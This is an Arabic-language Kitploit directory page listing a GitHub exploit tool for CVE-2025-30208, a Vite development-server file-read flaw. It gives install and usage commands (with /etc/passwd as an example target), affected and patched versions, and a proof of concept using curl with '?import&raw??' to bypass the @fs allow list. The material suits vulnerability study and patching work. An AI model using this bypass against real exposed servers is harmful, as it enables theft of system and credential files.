Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-30208 — هذا الاستغلال مخصص للأغراض التعليمية واختبار الأمان الأخلاقي فقط. استخدام هذا الاستغلال ضد أهداف دون موافقة متبادلة مسبقة غير قانوني، والمطور يخلي مسؤوليته عن أي سوء استخدام أو ضرر يسببه هذا الاستغلال. | Kitploit
أدوات/GitHubGitHub/on1onss/cve-2025-30208
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubon1onss/cve-2025-30208

CVE-2025-30208

هذا الاستغلال مخصص للأغراض التعليمية واختبار الأمان الأخلاقي فقط. استخدام هذا الاستغلال ضد أهداف دون موافقة متبادلة مسبقة غير قانوني، والمطور يخلي مسؤوليته عن أي سوء استخدام أو ضرر يسببه هذا الاستغلال.

عرض المستودع
4منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-30208

[!IMPORTANT]

إخلاء المسؤولية

هذا الاستغلال مخصص لأغراض الاختبار الأمني التعليمي والأخلاقي فقط. استخدام هذا الاستغلال ضد أهداف دون موافقة متبادلة مسبقة غير قانوني، ويخلي المطور مسؤوليته عن أي سوء استخدام أو ضرر ناتج عن هذا الاستغلال.

التثبيت

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

الوصف

الإصدارات المتأثرة

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

الإصدارات التي تم تصحيحها

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

الملخص

يمكن إرجاع محتويات الملفات التعسفية إلى المتصفح.

التأثير

تتأثر فقط التطبيقات التي تعرض خادم Vite التطويري للشبكة بشكل صريح (باستخدام خيار --host أو server.host).

التفاصيل

يمنع @fs الوصول إلى الملفات خارج قائمة السماح لخدمة Vite. إضافة ?raw?? أو ?import&raw?? إلى عنوان URL يتجاوز هذا التحديد ويعيد محتوى الملف إذا كان موجودًا. يوجد هذا التجاوز لأن الفواصل اللاحقة مثل ? تتم إزالتها في عدة أماكن، ولكن لا يتم أخذها في الاعتبار في تعبيرات regex الخاصة بسلسلة الاستعلام.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
تنزيل الأداة